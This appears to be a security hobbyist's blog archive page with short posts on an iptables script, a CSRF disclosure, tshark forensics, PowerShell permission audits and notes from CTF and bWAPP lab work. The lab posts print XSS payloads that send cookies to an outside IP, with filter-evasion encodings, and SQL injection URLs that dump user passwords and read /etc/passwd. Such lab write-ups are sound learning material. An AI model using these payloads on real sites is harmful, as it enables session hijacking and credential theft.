Sunday, March 13, 2016

Weevely - PHP Backdoor

Recently at BSides SLC 2016 I had a class which introduced the usage of Weevely.  Here are a couple of links that complemented the training that I had:

http://exploiterz.blogspot.com/2013/09/how-to-backdoor-webserver-using-weevely.html

http://null-byte.wonderhowto.com/forum/hiob-generate-web-backdoors-php-using-weevely-kali-linux-0158905/

Saturday, March 12, 2016

Simple Script to Configure iptables

I have been utilizing Cloud at Cost to put together a variety of labs.  I build the below iptables script to configure it for a base installation until I can configure it further.





#!/bin/bash

allowedTCPInbound="22"
#allowedUDPInbound="53"

iptables -F
iptables -X
iptables -Z

iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT ACCEPT

iptables -A INPUT -s 127.0.0.1 -j ACCEPT
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

for port in $allowedTCPInbound; do
 #iptables -A INPUT -p tcp --dport $port -j LOG --log-prefix '*** Allowed TCP Connection ***'
 iptables -A INPUT -p tcp --dport $port -j ACCEPT
done

#for port in $allowedUDPInbound; do
# iptables -A INPUT -p udp --dport $port -j LOG --log-prefix '*** Allowed UDP Connection ***'
# iptables -A INPUT -p udp --dport $port -j ACCEPT
#done

iptables -A INPUT -p udp --dport 67 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - NetBIOS
iptables -A INPUT -p udp --dport 137 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - NetBIOS
iptables -A INPUT -p udp --dport 138 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - NetBIOS 
iptables -A INPUT -p tcp --dport 139 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - NetBIOS 
iptables -A INPUT -p tcp --dport 445 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - NetBIOS 
iptables -A INPUT -p udp --dport 9181 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - NetBIOS 
iptables -A INPUT -p udp --dport 17500 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast
iptables -A INPUT -p udp --dport 32412 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - Plex Server UDP Discover Devices
iptables -A INPUT -p udp --dport 32414 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - Plex Server UDP Discover Devices

iptables -A INPUT -p tcp -j LOG --log-prefix '*** DROP TCP Connection ***'
iptables -A INPUT -p udp -j LOG --log-prefix '*** DROP UDP Connection ***'
iptables -A INPUT -p icmp -j LOG --log-prefix '*** DROP ICMP Connection ***'




You can also download it from here.

Friday, March 11, 2016

BSides 2016 Hackers Challenge

At BSides 2016 I participated in their Hackers Challenge.  The challenges were based on reverse engineering, network packet analysis, and many other puzzles that you needed to figure out.  When I had hit the wall at 3AM in the morning on March 11th I was in 2nd place.  By the end of the competition which was at 10AM I had dropped to 7th.  The challenge was great! Thanks BSides...

Check-out the django.nV project.  This is a project that was used in the Hackers Challenge but was adapted from its original state.

Screenshot of being in 2nd place at 3AM.


Screenshot of being in 7th place at the end of the competition.



One thing to note is most of the challenges were worth 4,000 points in the beginning.  If you did the challenge and no-one else you kept the 4,000 points.  For each participant that accomplished the challenge you had to divide the points with them.

Responsible Disclosure of CSRF in PHP Fusion 9

Recently I did some testing with PHP Fusion 9 and found that I could create additional users as the admin is logged in due to the application not protecting against CSRF.  I reached out to the development team and they had it fixed within 72 hours.  Below is the original video that I sent them and then they provided one back showing they had fixed it and to test it again.

Video - Adding a user account through CSRF

video



Then here is the response about fixing the vulnerability in version 9.
Here is the youtube video that he posted as shown above in the screenshot:  https://www.youtube.com/watch?v=5eLfA_ZEujQ&feature=youtu.be



Forensics - Mount Windows Partition Showing the System Files

Mount a windows partition showing the system files:
mount -o ro,show_sys_files,streams_interface=windows /dev/sdb2 /mnt/analysis

Taken from "Super Time Line Analysis - SANS DFIR Webcast" https://www.youtube.com/watch?v=C4jNfXZ90fw


CyberSecurity Challenge Australia 2014 In a Box - YAWU - Yet Another Write-up

This challenge can be downloaded from vulnhub.com.

Web Application Pentest Section

80 points - Only VIP and registered users are allowed to view the Blog. Become VIP to gain access to the Blog to reveal the hidden flag.

Looking at the web page we notice when the page is first visited that the link to the "Blog" is disabled.  Somehow we need to reenable the link to get the flag.


Below is a python script to quickly pass a GET request on the index.py page.



Notice that among the cookies returned is a vip=0.  With this sort of return you can suppose that a VIP user is going to be a value other than 0.  If I modify it to be a 1 the link to the Blog becomes enabled.  With clicking on the Blog link then the flag appears.




160 points - Gain access to the Blog as a registered user to reveal the hidden flag.

The blog allows you to insert comments.  Checking to see if XSS is possible as a comment is inserted.  At the bottom of the textbox you can see how you can make text bold, italicized, and then to add a link.  Upon testing the addition of a link, inside the link title is where we can place the XSS.
With this understanding we can now include XSS in the page to pull the session cookies of other visitors to the pages.  Tried the following in a link title tag:

[<SCRIPT type="text/javascript">var adr = 'http://172.16.102.1/test.php?cookie=' + escape(document.cookie);</SCRIPT>](Test)

This above script was filtered and not posted as a comment...  Trying a different encoding. (URL encoded)

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F172.16.102.1%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

This time the comment did post as a link however the IP Address is truncated after the first octet.  Going to further encode the IP Address and change the periods to be URL encoded.

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F172%2E16%2E102%2E1%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

Tried the above and it still caught the IP Address that was encoded.  I need a way to encode the IP address and found the following:


This is interesting. The link in this page appears as the following:

<a id="ctl00_ctl00_WholeBody_ContentPane_ContentArea_Body_encCrazyIp" href="http://2886755841" style="font-weight:bold;">2886755841</a>


Below is a python script that I found to convert an IP address to a decimal encoded number.

#!/usr/bin/python

import socket, struct
print struct.unpack("!I", socket.inet_aton("172.16.102.1"))[0]
Output: 2886755841

With the encoded IP Address I changed the comment to be as follows however I notice that we are truncated to just 50+ characters:

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F2886755841%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

So the following does pull the PHPSESSID:

[<script>document.location='http://2886755841/?c='+document.cookie;</script>](Test)

However this redirects the user and does not do it blindly. (The below does not work.)

[<script src='http://2886755841/?c='+document.cookie></script>](Test)






220 points - Retrieve the hidden flag from the database.



260 points - Retrieve the hidden flag by gaining access to the caching control panel.



280 points - Reveal the final flag, which is hidden in the /flag.txt file on the web server.

cmd.exe Count Lines returned with netstat from the command line

I was testing the threshold of the number of connections on a web server and threw together a dos command to accomplish the minor task.  Inside the command prompt I executed:

netstat -an | find /i "<ip address>" | find /N /i "ESTABLISHED"

tshark - More than I ever wanted to know...

Recently I purchased the book, "The Practice of Network Security Monitoring" by Richard Bejtlich.  I was reading in chapter 7 of the book about the Digital Corpora project located at http://www.digitalcorpora.org.  In the chapter he presents the scenario of the "Nitroba University Harassment Scenario".  A pcap can be downloaded about how a teacher was being harassed by a student and the object of the scenario is to identify who did it and with what evidence.  The scenario and the files you need are located at the following link.

In the book they are using the scenario to explain and teach about the tool called Xplico.  However, I am going to use the scenario to identify useful tshark commands that can be used in such an investigation.

The first lead in the investigation is that of an IP Address.  "The mail header shows that the mail message originated from the IP address 140.247.62.34, which is a Nitroba student dorm room. "

IP Address: 140.247.62.34.  I am going to use tshark to isolate and save to another pcap all activity with the IP Address as the source or destination.

tshark -r nitroba.pcap -Y "ip.src==140.247.62.34 or ip.dst==140.247.62.34" -w 140_247_62_34.pcap

The above tshark command reads like this:
-r nitroba.pcap - Read the nitroba.pcap file
-Y "ip.src==140.247.62.34 or ip.dst==140.247.62.34" - Filter so the source and destination are the same
-w 140_247_62_34.pcap - Write the packets that were found to the following file

From the information that is extracted the IP Address of 192.168.15.4 is observed.  This would be a private non-routable IP Address that is used.  In the packet capture I wonder how many private non-routeable IP Addresses there are:

tshark -r nitroba.pcap -T fields -e ip.src > ip-src.txt

The above tshark command reads like this:
-T fields - Sets the output to that of fields
-e ip.src - Defines which fields to output
> ip-src.txt - Redirects the output to a text file

$ cat ip-src.txt | sort | uniq -c | sort -n | grep -e " 172\." -e " 192\.168\." -e " 10\."
      2 192.168.15.2
      3 192.168.15.7
      6 192.168.15.8
      8 10.0.1.5
     14 192.168.15.5
     16 192.168.1.5
   1486 192.168.1.254
   2154 192.168.15.1
   6818 192.168.1.64
  34554 192.168.15.4

The above command takes the output of the source IP addresses then I used sort to sort them in a list, then I used uniq to count the number of instances and then place the count in the front of the IP, then sort the frequency of usage, and grep out the private IP Address ranges.

We can tell the busiest device is 192.168.15.4.  Let's look into the devices more and try and determine what they are.  I am going to use the MAC addresses of each device to try and identify the vendor that manufactured the device.

tshark -r nitroba.pcap -T fields -e ip.src -e eth.src > ip-src-and-mac-src.txt
cat ip-src-and-mac-src.txt | sort | uniq -c | sort -rn | grep -e " 172\." -e " 192\.168\." -e " 10\."

34554
192.168.15.4
00:17:f2:e2:c0:ce
Apple
6814
192.168.1.64
00:1d:d9:2e:4f:61
Hon Hai Precision
2154
192.168.15.1
00:1d:d9:2e:4f:60
Hon Hai Precision
1161
192.168.1.254
00:1d:d9:2e:4f:60
Hon Hai Precision
325
192.168.1.254
00:1d:6b:99:98:68
Arris Group
16
192.168.1.5
00:0a:95:69:38:cc
Apple
14
192.168.15.5
00:14:d1:44:a0:f1
Trendnet
8
10.0.1.5
00:1c:b3:79:00:31
Apple
6
192.168.15.8
00:16:cb:b4:a3:f8
Apple
4
192.168.1.64
00:1f:f3:5a:77:9b
Apple
3
192.168.15.7
00:1c:b3:79:00:31
Apple
2
192.168.15.2
00:1b:63:f1:8a:6e
Apple

With adding the source ethernet address we noticed that there is a total of 12 devices that we should gather knowledge about, not just the 10 above based on the IP Addresses.  I have bolded the IP Addresses that have more than one MAC address associated with it.  I also included the manufacturer next to the MAC Address.

The MAC Address of 00:1c:b3:79:00:31 is also found to have used 2 IP Addresses. 10.0.1.5 and 192.168.15.7

192.168.1.64 is the gateway
192.168.1.254 is the DNS Server
192.168.15.1 is the inside of the gateway
192.168.15.4 is the main IP of interest
192.168.15.5 is nothing


Did not complete the scenario...

File and Folder Auditing with Powershell

http://blogs.technet.com/b/zarkatech/archive/2012/01/14/audit-file-server-permissions-using-powershell.aspx


$ErrorActionPreference = "Continue"
$strComputer = $env:ComputerName
$colDrives = Get-PSDrive -PSProvider Filesystem
    $StartPath = "\\myserver\share"
    Get-ChildItem -LiteralPath $StartPath -Recurse |
    ForEach {
      $FullPath = Get-Item -LiteralPath (Get-Item -LiteralPath $_.PSPath)
      (Get-Item -LiteralPath $FullPath).GetAccessControl() |
      Select * -Expand Access |
      Select @{N='Server Name';E={$strComputer}},
             @{N='Full Path';E={$FullPath}},
             @{N='Type';E={If($FullPath.PSIsContainer -eq $True) {'D'} Else {'F'}}},
             @{N='Owner';E={$_.Owner}},
             @{N='Trustee';E={$_.IdentityReference}} } |
             #@{N='Inherited';E={$_.IsInherited}},
             #@{N='Inheritance Flags';E={$_.InheritanceFlags}},
             #@{N='Ace Flags';E={$_.PropagationFlags}},
             #@{N='Ace Type';E={$_.AccessControlType}},
             #@{N='Access Masks';E={$_.FileSystemRights}} } |
      Export-CSV -NoTypeInformation -Delimiter "," –Path "$strComputer`_myserver-share.csv"

Audit File and Folder Permissions - Powershell

################################################################################
# AUDIT FILE & FOLDER PERMISSIONS v1.1
# by Roman Zarka | Microsoft Services
################################################################################

$ErrorActionPreference = "Continue"
$strComputer = $env:ComputerName
$colDrives = Get-PSDrive -PSProvider Filesystem 
    $StartPath = "\\server\share"
    Get-ChildItem -LiteralPath $StartPath -Recurse |
    ForEach {
      $FullPath = Get-Item -LiteralPath (Get-Item -LiteralPath $_.PSPath)
      (Get-Item -LiteralPath $FullPath).GetAccessControl() |
      Select * -Expand Access |
      Select @{N='Server Name';E={$strComputer}},
             @{N='Full Path';E={$FullPath}},
             @{N='Type';E={If($FullPath.PSIsContainer -eq $True) {'D'} Else {'F'}}},
             @{N='Owner';E={$_.Owner}},
             @{N='Trustee';E={$_.IdentityReference}} } |
             #@{N='Inherited';E={$_.IsInherited}},
             #@{N='Inheritance Flags';E={$_.InheritanceFlags}},
             #@{N='Ace Flags';E={$_.PropagationFlags}},
             #@{N='Ace Type';E={$_.AccessControlType}},
             #@{N='Access Masks';E={$_.FileSystemRights}} } |
      Export-CSV -NoTypeInformation -Delimiter "," –Path "$strComputer`_share.csv"

Notes from bWAPP v2.2

These are my quick notes that I recorded as I worked through bWAPP v2.2

--- SQLi GET / Search Results - With security level set to low

URL with SQLi:
http://bwapp/sqli_1.php?title=a' union SELECT 1,table_schema,table_name,4,5,6,7 FROM information_schema.tables WHERE table_schema!='mysql' AND table_schema!='information_schema&action=search

The above query was taken from the MySQL SQL Injection Cheat Sheet located here.  The purpose of this query is to have returned the database and table names of the database.  I also had to experiment with the number of columns that were expected and how it was displayed.



Now I need to find out the structure of the tables...

URL for SQLi:
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,table_schema,%20table_name,%204,column_name,6,7%20FROM%20information_schema.columns%20WHERE%20column_name=%27password%27%20AND%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema&action=search

The above SQL injection returns the columns of the tables that contain the word password in them so now we can formulate our query to begin extracting information.  The below query counts the records in the users table before we extract it in the event a lot of records are available to be extracted.

http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20count%28*%29,%203,%204,%205,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search

This returns that there are 2 records that can be extracted.

http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20login,%20password,%20email,%20admin,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search

The above query returned the login, password, email and if they are an admin of the application in the search results...

--- SQLi GET / Select - With security level set to low...

In this challenge it only returns 1 record at a time because evaluating the code it does not loop around the recordset that is returned.  This adds a small challenge, however, not impossible to do the same thing as above.

SQLi URL:
http://bwapp/sqli_2.php?movie=99%20union%20SELECT%201,table_schema,table_name,4,LOAD_FILE%28%27/etc/passwd%27%29,6,7%20FROM%20information_schema.tables%20WHERE%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27&action=go

The above query returns the 99th row of the union selected query with also loading the /etc/passwd file so we can gather the user names on the system.

SQL Injection Boolean Based

— The below method would allow for trying each character in a character set until it came back with the correct character...
Iron Man' AND SUBSTRING(@@hostname,1,1) = ‘b - Worked
Iron Man’ AND SUBSTRING(@@hostname,2,1) = ‘W - Worked

— What if we use regular expressions to determine if the letter is between a set of characters…

Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-n] - Returns True
Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-g] - Returns True
Iron Man’ AND SUBSTRING(@@hostname,1,1) REGEXP ‘[a-c] - Returns True
— This narrows it down to less than 8 queries to figure out the first character of the hostname…  It would have taken 2 or 28 depending on if you started with a-z or A-Z.






Docker - Quick Notes and How To

For an ethical hacking class that I will be teaching coming up in the near future I wanted to identify a way where I could provide students ...